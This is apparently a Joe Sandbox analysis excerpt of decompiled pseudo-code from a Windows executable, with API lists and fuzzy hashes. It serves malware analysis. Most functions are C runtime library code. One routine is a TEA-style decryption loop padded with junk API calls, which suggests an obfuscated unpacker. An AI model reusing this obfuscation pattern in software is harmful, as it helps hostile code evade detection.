                        						_v8 = _t82;
                        						_v16 = _t97;
                        						_t81 = _t97;
                        						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                        							_v12 = 0x1000;
                        						} else {
                        							_v12 =  *(_t100 + 0x18);
                        						}
                        						__eflags = _t97;
                        						if(_t97 == 0) {
                        							L32:
                        							return _a12;
                        						} else {
                        							do {
                        								_t84 =  *(_t100 + 0xc) & 0x00000108;
                        								__eflags = _t84;
                        								if(_t84 == 0) {
                        									L18:
                        									__eflags = _t81 - _v12;
                        									if(_t81 < _v12) {
                        										_t68 = E0040B465(_t90, _t97,  *_v8, _t100);
                        										__eflags = _t68 - 0xffffffff;
                        										if(_t68 == 0xffffffff) {
                        											L34:
                        											_t69 = _t97;
                        											L35:
                        											return (_t69 - _t81) / _a8;
                        										}
                        										_v8 = _v8 + 1;
                        										_t72 =  *(_t100 + 0x18);
                        										_t81 = _t81 - 1;
                        										_v12 = _t72;
                        										__eflags = _t72;
                        										if(_t72 <= 0) {
                        											_v12 = 1;
                        										}
                        										goto L31;
                        									}
                        									__eflags = _t84;
                        									if(_t84 == 0) {
                        										L21:
                        										__eflags = _v12;
                        										_t98 = _t81;
                        										if(_v12 != 0) {
                        											_t75 = _t81;
                        											_t90 = _t75 % _v12;
                        											_t98 = _t98 - _t75 % _v12;
                        											__eflags = _t98;
                        										}
                        										_push(_t98);
                        										_push(_v8);
                        										_push(E00408D86(_t100));
                        										_t74 = E00408CAA(_t81, _t90, _t98, _t100, __eflags);
                        										_t101 = _t101 + 0xc;
                        										__eflags = _t74 - 0xffffffff;
                        										if(_t74 == 0xffffffff) {
                        											L36:
                        											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                        											_t69 = _v16;
                        											goto L35;
                        										} else {
                        											_t88 = _t98;
                        											__eflags = _t74 - _t98;
                        											if(_t74 <= _t98) {
                        												_t88 = _t74;
                        											}
                        											_v8 = _v8 + _t88;
                        											_t81 = _t81 - _t88;
                        											__eflags = _t74 - _t98;
                        											if(_t74 < _t98) {
                        												goto L36;
                        											} else {
                        												L27:
                        												_t97 = _v16;
                        												goto L31;
                        											}
                        										}
                        									}
                        									_t77 = E00406324(_t100);
                        									__eflags = _t77;
                        									if(_t77 != 0) {
                        										goto L34;
                        									}
                        									goto L21;
                        								}
                        								_t78 =  *(_t100 + 4);
                        								__eflags = _t78;
                        								if(__eflags == 0) {
                        									goto L18;
                        								}
                        								if(__eflags < 0) {
                        									_t48 = _t100 + 0xc;
                        									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                        									__eflags =  *_t48;
                        									goto L34;
                        								}
                        								_t99 = _t81;
                        								__eflags = _t81 - _t78;
                        								if(_t81 >= _t78) {
                        									_t99 = _t78;
                        								}
                        								E0040B100(_t81, _t99, _t100,  *_t100, _v8, _t99);
                        								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                        								 *_t100 =  *_t100 + _t99;
                        								_t101 = _t101 + 0xc;
                        								_t81 = _t81 - _t99;
                        								_v8 = _v8 + _t99;
                        								goto L27;
                        								L31:
                        								__eflags = _t81;
                        							} while (_t81 != 0);
                        							goto L32;
                        						}
                        					}
                        					L3:
                        					_t61 = E0040747B();
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					 *_t61 = 0x16;
                        					E00409867(_t90, 0, _t100);
                        					goto L4;
                        				}
                        			}





























                        0x0040b5c9
                        0x0040b5d9
                        0x0040b5ff
                        0x00000000
                        0x0040b5e0
                        0x0040b5e0
                        0x0040b5e5
                        0x0040b606
                        0x0040b606
                        0x0040b609
                        0x0040b60b
                        0x00000000
                        0x00000000
                        0x0040b60d
                        0x0040b612
                        0x0040b615
                        0x0040b618
                        0x00000000
                        0x00000000
                        0x0040b61d
                        0x0040b621
                        0x0040b628
                        0x0040b62b
                        0x0040b62e
                        0x0040b630
                        0x0040b63a
                        0x0040b632
                        0x0040b635
                        0x0040b635
                        0x0040b641
                        0x0040b643
                        0x0040b708
                        0x00000000
                        0x0040b649
                        0x0040b649
                        0x0040b64c
                        0x0040b64c
                        0x0040b652
                        0x0040b683
                        0x0040b683
                        0x0040b686
                        0x0040b6df
                        0x0040b6e6
                        0x0040b6e9
                        0x0040b714
                        0x0040b714
                        0x0040b716
                        0x00000000
                        0x0040b71a
                        0x0040b6eb
                        0x0040b6ee
                        0x0040b6f1
                        0x0040b6f2
                        0x0040b6f5
                        0x0040b6f7
                        0x0040b6f9
                        0x0040b6f9
                        0x00000000
                        0x0040b6f7
                        0x0040b688
                        0x0040b68a
                        0x0040b697
                        0x0040b697
                        0x0040b69b
                        0x0040b69d
                        0x0040b6a1
                        0x0040b6a3
                        0x0040b6a6
                        0x0040b6a6
                        0x0040b6a6
                        0x0040b6a8
                        0x0040b6a9
                        0x0040b6b3
                        0x0040b6b4
                        0x0040b6b9
                        0x0040b6bc
                        0x0040b6bf
                        0x0040b722
                        0x0040b722
                        0x0040b726
                        0x00000000
                        0x0040b6c1
                        0x0040b6c1
                        0x0040b6c3
                        0x0040b6c5
                        0x0040b6c7
                        0x0040b6c7
                        0x0040b6c9
                        0x0040b6cc
                        0x0040b6ce
                        0x0040b6d0
                        0x00000000
                        0x0040b6d2
                        0x0040b6d2
                        0x0040b6d2
                        0x00000000
                        0x0040b6d2
                        0x0040b6d0
                        0x0040b6bf
                        0x0040b68d
                        0x0040b693
                        0x0040b695
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040b695
                        0x0040b654
                        0x0040b657
                        0x0040b659
                        0x00000000
                        0x00000000
                        0x0040b65b
                        0x0040b710
                        0x0040b710
                        0x0040b710
                        0x00000000
                        0x0040b710
                        0x0040b661
                        0x0040b663
                        0x0040b665
                        0x0040b667
                        0x0040b667
                        0x0040b66f
                        0x0040b674
                        0x0040b677
                        0x0040b679
                        0x0040b67c
                        0x0040b67e
                        0x00000000
                        0x0040b700
                        0x0040b700
                        0x0040b700
                        0x00000000
                        0x0040b649
                        0x0040b643
                        0x0040b5e7
                        0x0040b5e7
                        0x0040b5ec
                        0x0040b5ed
                        0x0040b5ee
                        0x0040b5ef
                        0x0040b5f0
                        0x0040b5f1
                        0x0040b5f7
                        0x00000000
                        0x0040b5fc

                        APIs
                        • __flush.LIBCMT ref: 0040B68D
                        • __fileno.LIBCMT ref: 0040B6AD
                        • __locking.LIBCMT ref: 0040B6B4
                        • __flsbuf.LIBCMT ref: 0040B6DF
                          • Part of subcall function 0040747B: __getptd_noexit.LIBCMT ref: 0040747B
                          • Part of subcall function 00409867: __decode_pointer.LIBCMT ref: 00409872
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                        • String ID: w_@$w_@
                        • API String ID: 3240763771-614044935
                        • Opcode ID: 7ef8ad68f24ec646da2e8474396d1447a719726a16c880bf03455043e50d3b06
                        • Instruction ID: 5f5606b89cac3dbd6312031acd89d28b1066f652792005636562e4df81556f48
                        • Opcode Fuzzy Hash: 7ef8ad68f24ec646da2e8474396d1447a719726a16c880bf03455043e50d3b06
                        • Instruction Fuzzy Hash: 57419331A006049BDB249F6AC84455FB7B6EF80324F24893BE455B72C0D779DD518B9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E00404BB7(void* __eflags, unsigned int* _a4) {
                        				signed int _v8;
                        				signed int _v12;
                        				char _v16;
                        				unsigned int _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				char _v36;
                        				intOrPtr _v40;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				intOrPtr _v52;
                        				intOrPtr _v56;
                        				intOrPtr* _t68;
                        				intOrPtr _t69;
                        				intOrPtr _t70;
                        				intOrPtr _t73;
                        				intOrPtr _t74;
                        				intOrPtr _t78;
                        				unsigned int* _t99;
                        				signed int _t104;
                        				unsigned int _t111;
                        
                        				_t68 = _a4;
                        				_t111 =  *(_t68 + 4);
                        				_t69 =  *0x419478; // 0x46423acc
                        				_v48 = _t69;
                        				_t70 =  *0x41947c; // 0x4ce84183
                        				_v52 = _t70;
                        				_v20 =  *_t68;
                        				_v16 = 0;
                        				_v56 = 0x9e3779b9;
                        				E00404BAD( &_v16);
                        				_v16 = _v16 + 0x23f;
                        				if( *0x445124 == 0x14) {
                        					BackupEventLogW(0, 0);
                        				}
                        				_t73 =  *0x419480; // 0xc41ab464
                        				_v40 = _t73;
                        				_t74 =  *0x419484; // 0xf1efd5d3
                        				_v44 = _t74;
                        				_v36 = 0x20;
                        				_t104 = 2;
                        				do {
                        					_v28 = _t104;
                        					_v28 = _v28 + 3;
                        					_v8 = (_v20 << 4) + _v40;
                        					_t78 =  *0x445124;
                        					if(_t78 == 0xfa9) {
                        						 *0x444f84 = 0xedeb2e40;
                        					}
                        					if(_t78 == 0x3eb) {
                        						 *0x444eec = 0;
                        					}
                        					_v24 = _v20;
                        					_v24 = _v24 + _v16;
                        					_v12 = _v20 >> 5;
                        					 *0x444f80 = 0xf4ea3dee;
                        					E00404BB4( &_v12, _v44);
                        					_v8 = _v8 ^ _v24;
                        					if( *0x445124 == 0x9e6) {
                        						GetLastError();
                        					}
                        					_v12 = _v12 ^ _v8;
                        					if( *0x445124 == 0x213) {
                        						WaitNamedPipeW(0, 0);
                        						__imp__AssignProcessToJobObject(0, 0);
                        						GetFullPathNameW(0, 0, 0, 0);
                        					}
                        					_t111 = _t111 - _v12;
                        					_v32 = _t104;
                        					_v32 = _v32 - 0x5396dd36;
                        					_v32 = _v32 + 0x5396dd38;
                        					_v8 = (_t111 << _v32) + _v48;
                        					_v24 = _v16 + _t111;
                        					_v12 = _t111 >> _v28;
                        					_v12 = _v12 + _v52;
                        					_v8 = _v8 ^ _v24;
                        					_v8 = _v8 ^ _v12;
                        					 *0x443e8c = 0;
                        					_v20 = _v20 - _v8;
                        					_v16 = _v16 - _v56;
                        					_t63 =  &_v36;
                        					 *_t63 = _v36 - 1;
                        				} while ( *_t63 != 0);
                        				_t99 = _a4;
                        				_t99[1] = _t111;
                        				 *_t99 = _v20;
                        				return _t99;
                        			}

























                        0x00404bbd
                        0x00404bc4
                        0x00404bc7
                        0x00404bcc
                        0x00404bcf
                        0x00404bd7
                        0x00404bdd
                        0x00404be0
                        0x00404be3
                        0x00404bea
                        0x00404bef
                        0x00404bfd
                        0x00404c01
                        0x00404c01
                        0x00404c07
                        0x00404c0c
                        0x00404c0f
                        0x00404c16
                        0x00404c19
                        0x00404c20
                        0x00404c21
                        0x00404c21
                        0x00404c24
                        0x00404c31
                        0x00404c34
                        0x00404c3e
                        0x00404c40
                        0x00404c40
                        0x00404c4f
                        0x00404c51
                        0x00404c51
                        0x00404c5a
                        0x00404c60
                        0x00404c69
                        0x00404c72
                        0x00404c7c
                        0x00404c84
                        0x00404c91
                        0x00404c93
                        0x00404c93
                        0x00404c9c
                        0x00404ca9
                        0x00404cad
                        0x00404cb5
                        0x00404cbf
                        0x00404cbf
                        0x00404cc5
                        0x00404cc8
                        0x00404ccb
                        0x00404cd2
                        0x00404ce6
                        0x00404cee
                        0x00404cf5
                        0x00404cfb
                        0x00404d01
                        0x00404d07
                        0x00404d0a
                        0x00404d13
                        0x00404d19
                        0x00404d1c
                        0x00404d1c
                        0x00404d1c
                        0x00404d25
                        0x00404d2c
                        0x00404d30
                        0x00404d34

                        APIs
                        • BackupEventLogW.ADVAPI32(00000000,00000000), ref: 00404C01
                        • GetLastError.KERNEL32 ref: 00404C93
                        • WaitNamedPipeW.KERNEL32(00000000,00000000), ref: 00404CAD
                        • AssignProcessToJobObject.KERNEL32 ref: 00404CB5
                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404CBF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: AssignBackupErrorEventFullLastNameNamedObjectPathPipeProcessWait
                        • String ID:
                        • API String ID: 2469782577-3916222277
                        • Opcode ID: 541ecef081ee040b67d14b9ac10220eb640bc442db787b617790e092d1a062aa
                        • Instruction ID: 5173775d80f432e06bba884d70d159a9ebc0f21b1bac49410213de4ea9214d94
                        • Opcode Fuzzy Hash: 541ecef081ee040b67d14b9ac10220eb640bc442db787b617790e092d1a062aa
                        • Instruction Fuzzy Hash: 4051D2B5D01218EFDB00DFA9D984AAEBBF4FB99310F10806AE455F7250D374AA41CF59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 89%
                        			E00416028(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t48;
                        				void* _t53;
                        				intOrPtr _t57;
                        				void* _t58;
                        				void* _t61;
                        
                        				_t61 = __eflags;
                        				_push(0x2c);
                        				_push(0x4172f0);
                        				E00408168(__ebx, __edi, __esi);
                        				_t48 = __ecx;
                        				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                        				_t57 =  *((intOrPtr*)(_t58 + 8));
                        				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                        				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                        				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                        				 *((intOrPtr*)(_t58 - 0x28)) = E00415BC3(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                        				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0040BD70(__ecx, _t53, _t61) + 0x88));
                        				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0040BD70(_t48, _t53, _t61) + 0x8c));
                        				 *((intOrPtr*)(E0040BD70(_t48, _t53, _t61) + 0x88)) = _t57;
                        				 *((intOrPtr*)(E0040BD70(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                        				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                        				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                        				 *(_t58 - 4) = 1;
                        				 *((intOrPtr*)(_t58 - 0x1c)) = E00415C68(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                        				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                        				 *(_t58 - 4) = 0xfffffffe;
                        				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                        				E0041614E(_t48, _t53, _t55, _t57, _t61);
                        				return E004081AD( *((intOrPtr*)(_t58 - 0x1c)));
                        			}








                        0x00416028
                        0x00416028
                        0x0041602a
                        0x0041602f
                        0x00416034
                        0x00416036
                        0x00416039
                        0x0041603c
                        0x0041603f
                        0x00416046
                        0x00416057
                        0x00416065
                        0x00416073
                        0x0041607b
                        0x00416089
                        0x0041608f
                        0x00416096
                        0x00416099
                        0x004160af
                        0x004160b2
                        0x00416127
                        0x0041612e
                        0x00416135
                        0x00416142

                        APIs
                        • __CreateFrameInfo.LIBCMT ref: 00416050
                          • Part of subcall function 00415BC3: __getptd.LIBCMT ref: 00415BD1
                          • Part of subcall function 00415BC3: __getptd.LIBCMT ref: 00415BDF
                        • __getptd.LIBCMT ref: 0041605A
                          • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                          • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                        • __getptd.LIBCMT ref: 00416068
                        • __getptd.LIBCMT ref: 00416076
                        • __getptd.LIBCMT ref: 00416081
                        • _CallCatchBlock2.LIBCMT ref: 004160A7
                          • Part of subcall function 00415C68: __CallSettingFrame@12.LIBCMT ref: 00415CB4
                          • Part of subcall function 0041614E: __getptd.LIBCMT ref: 0041615D
                          • Part of subcall function 0041614E: __getptd.LIBCMT ref: 0041616B
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                        • String ID:
                        • API String ID: 1602911419-0
                        • Opcode ID: 4b2ab6df44a4890b6c780c4c42d9139b8766dfd5e5185ba154c89391fd6b34d0
                        • Instruction ID: 0daa8b67c47c473bc710cfcf4bfcec87d77ca9b3cc66d9d98589ed68b50df625
                        • Opcode Fuzzy Hash: 4b2ab6df44a4890b6c780c4c42d9139b8766dfd5e5185ba154c89391fd6b34d0
                        • Instruction Fuzzy Hash: A311C9B1C00209DFDB00EFA5D945AEEBBB0FF04314F10806EF854A7291DB389A519B98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 26%
                        			E004163D5(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                        				void* __ebp;
                        				void* _t20;
                        				void* _t22;
                        				void* _t23;
                        				void* _t25;
                        				intOrPtr* _t26;
                        				void* _t27;
                        				void* _t28;
                        
                        				_t27 = __esi;
                        				_t26 = __edi;
                        				_t23 = __ecx;
                        				_t22 = __ebx;
                        				_t30 = _a20;
                        				if(_a20 != 0) {
                        					_push(_a20);
                        					_push(__ebx);
                        					_push(__esi);
                        					_push(_a4);
                        					E00416343(__ebx, __edi, __esi, _t30);
                        					_t28 = _t28 + 0x10;
                        				}
                        				_t31 = _a28;
                        				_push(_a4);
                        				if(_a28 != 0) {
                        					_push(_a28);
                        				} else {
                        					_push(_t27);
                        				}
                        				E0041591B(_t23);
                        				_push( *_t26);
                        				_push(_a16);
                        				_push(_a12);
                        				_push(_t27);
                        				E00415DC0(_t22, _t25, _t26, _t27, _t31);
                        				_push(0x100);
                        				_push(_a24);
                        				_push(_a16);
                        				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                        				_push(_a8);
                        				_push(_t27);
                        				_push(_a4);
                        				_t20 = E00416028(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t26, _t27, _t31);
                        				if(_t20 != 0) {
                        					E004158D4(_t20, _t27);
                        					return _t20;
                        				}
                        				return _t20;
                        			}











                        0x004163d5
                        0x004163d5
                        0x004163d5
                        0x004163d5
                        0x004163da
                        0x004163de
                        0x004163e0
                        0x004163e3
                        0x004163e4
                        0x004163e5
                        0x004163e8
                        0x004163ed
                        0x004163ed
                        0x004163f0
                        0x004163f4
                        0x004163f7
                        0x004163fc
                        0x004163f9
                        0x004163f9
                        0x004163f9
                        0x004163ff
                        0x00416404
                        0x00416406
                        0x00416409
                        0x0041640c
                        0x0041640d
                        0x00416415
                        0x0041641a
                        0x0041641e
                        0x00416421
                        0x00416424
                        0x0041642a
                        0x0041642b
                        0x0041642e
                        0x00416438
                        0x0041643c
                        0x00000000
                        0x0041643c
                        0x00416442

                        APIs
                        • ___BuildCatchObject.LIBCMT ref: 004163E8
                          • Part of subcall function 00416343: ___BuildCatchObjectHelper.LIBCMT ref: 00416379
                        • _UnwindNestedFrames.LIBCMT ref: 004163FF
                        • ___FrameUnwindToState.LIBCMT ref: 0041640D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                        • String ID: TsA$csm
                        • API String ID: 2163707966-3388165190
                        • Opcode ID: 5ee04d9c283753622e4348d8cfe0cecd4f2f6ec43423cb856e4ca81c0f2d08e3
                        • Instruction ID: d69c25e17cad3efa29224d1e44031e3b4bab8f93dc90641abc2906f6c70405cc
                        • Opcode Fuzzy Hash: 5ee04d9c283753622e4348d8cfe0cecd4f2f6ec43423cb856e4ca81c0f2d08e3
                        • Instruction Fuzzy Hash: 1901467100010AFBDF126F52CC45EEB7F6AEF08354F01802ABC1815121DB3AD9B1DBAA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E00415D77(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                        				signed int _v8;
                        				void* __ebp;
                        				intOrPtr* _t15;
                        				intOrPtr* _t18;
                        				void* _t22;
                        
                        				_t25 = __esi;
                        				_t24 = __edi;
                        				_t23 = __edx;
                        				_t30 =  *((intOrPtr*)( *_a4)) - 0xe0434f4d;
                        				if( *((intOrPtr*)( *_a4)) == 0xe0434f4d) {
                        					__eflags =  *((intOrPtr*)(E0040BD70(_t22, __edx, __eflags) + 0x90));
                        					if(__eflags > 0) {
                        						_t15 = E0040BD70(_t22, __edx, __eflags) + 0x90;
                        						 *_t15 =  *_t15 - 1;
                        						__eflags =  *_t15;
                        					}
                        					goto L9;
                        				} else {
                        					__eflags = __eax - 0xe06d7363;
                        					if(__eflags != 0) {
                        						L9:
                        						__eflags = 0;
                        						return 0;
                        					} else {
                        						 *(E0040BD70(__ebx, __edx, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
                        						_push(8);
                        						_push(0x416fc0);
                        						E00408168(_t22, __edi, __esi);
                        						_t18 =  *((intOrPtr*)(E0040BD70(_t22, __edx, _t30) + 0x78));
                        						if(_t18 != 0) {
                        							_v8 = _v8 & 0x00000000;
                        							 *_t18();
                        							_v8 = 0xfffffffe;
                        						}
                        						return E004081AD(E00411135(_t22, _t23, _t24, _t25));
                        					}
                        				}
                        			}








                        0x00415d77
                        0x00415d77
                        0x00415d77
                        0x00415d83
                        0x00415d88
                        0x00415da7
                        0x00415dae
                        0x00415db5
                        0x00415dba
                        0x00415dba
                        0x00415dba
                        0x00000000
                        0x00415d8a
                        0x00415d8a
                        0x00415d8f
                        0x00415dbc
                        0x00415dbc
                        0x00415dbf
                        0x00415d91
                        0x00415d96
                        0x0040c34d
                        0x0040c34f
                        0x0040c354
                        0x0040c35e
                        0x0040c363
                        0x0040c365
                        0x0040c369
                        0x0040c374
                        0x0040c374
                        0x0040c385
                        0x0040c385
                        0x00415d8f

                        APIs
                        • __getptd.LIBCMT ref: 00415D91
                          • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                          • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                        • __getptd.LIBCMT ref: 00415DA2
                        • __getptd.LIBCMT ref: 00415DB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: __getptd$__amsg_exit__getptd_noexit
                        • String ID: MOC$csm
                        • API String ID: 803148776-1389381023
                        • Opcode ID: b7ff1ba13705d0e234ad541d03230bbea4906e090ae1f9df2853cd415b5ef04c
                        • Instruction ID: 7476e578de222c3f650eae696de84e137a600846ab43f73c4baadf4b58ee893f
                        • Opcode Fuzzy Hash: b7ff1ba13705d0e234ad541d03230bbea4906e090ae1f9df2853cd415b5ef04c
                        • Instruction Fuzzy Hash: 65E01A35110608CFC710AB69D04ABE977A5FF85318F1541A6E80CC73A3D73CE880968E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 89%
                        			E0040E92F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t15;
                        				LONG* _t21;
                        				long _t23;
                        				void* _t31;
                        				LONG* _t33;
                        				void* _t34;
                        				void* _t35;
                        
                        				_t35 = __eflags;
                        				_t29 = __edx;
                        				_t25 = __ebx;
                        				_push(0xc);
                        				_push(0x417108);
                        				E00408168(__ebx, __edi, __esi);
                        				_t31 = E0040BD70(__ebx, __edx, _t35);
                        				_t15 =  *0x418d34; // 0xfffffffe
                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                        					E00407670(_t25, _t29, _t31, 0xd);
                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                        					_t33 =  *(_t31 + 0x68);
                        					 *(_t34 - 0x1c) = _t33;
                        					__eflags = _t33 -  *0x418c38; // 0xb21860
                        					if(__eflags != 0) {
                        						__eflags = _t33;
                        						if(_t33 != 0) {
                        							_t23 = InterlockedDecrement(_t33);
                        							__eflags = _t23;
                        							if(_t23 == 0) {
                        								__eflags = _t33 - 0x418810;
                        								if(_t33 != 0x418810) {
                        									_push(_t33);
                        									E0040617D();
                        								}
                        							}
                        						}
                        						_t21 =  *0x418c38; // 0xb21860
                        						 *(_t31 + 0x68) = _t21;
                        						_t33 =  *0x418c38; // 0xb21860
                        						 *(_t34 - 0x1c) = _t33;
                        						InterlockedIncrement(_t33);
                        					}
                        					 *(_t34 - 4) = 0xfffffffe;
                        					E0040E9CA();
                        				} else {
                        					_t33 =  *(_t31 + 0x68);
                        				}
                        				if(_t33 == 0) {
                        					E00406BE8(0x20);
                        				}
                        				return E004081AD(_t33);
                        			}










                        0x0040e92f
                        0x0040e92f
                        0x0040e92f
                        0x0040e92f
                        0x0040e931
                        0x0040e936
                        0x0040e940
                        0x0040e942
                        0x0040e94a
                        0x0040e96b
                        0x0040e971
                        0x0040e975
                        0x0040e978
                        0x0040e97b
                        0x0040e981
                        0x0040e983
                        0x0040e985
                        0x0040e988
                        0x0040e98e
                        0x0040e990
                        0x0040e992
                        0x0040e998
                        0x0040e99a
                        0x0040e99b
                        0x0040e9a0
                        0x0040e998
                        0x0040e990
                        0x0040e9a1
                        0x0040e9a6
                        0x0040e9a9
                        0x0040e9af
                        0x0040e9b3
                        0x0040e9b3
                        0x0040e9b9
                        0x0040e9c0
                        0x0040e952
                        0x0040e952
                        0x0040e952
                        0x0040e957
                        0x0040e95b
                        0x0040e960
                        0x0040e968

                        APIs
                        • __getptd.LIBCMT ref: 0040E93B
                          • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                          • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
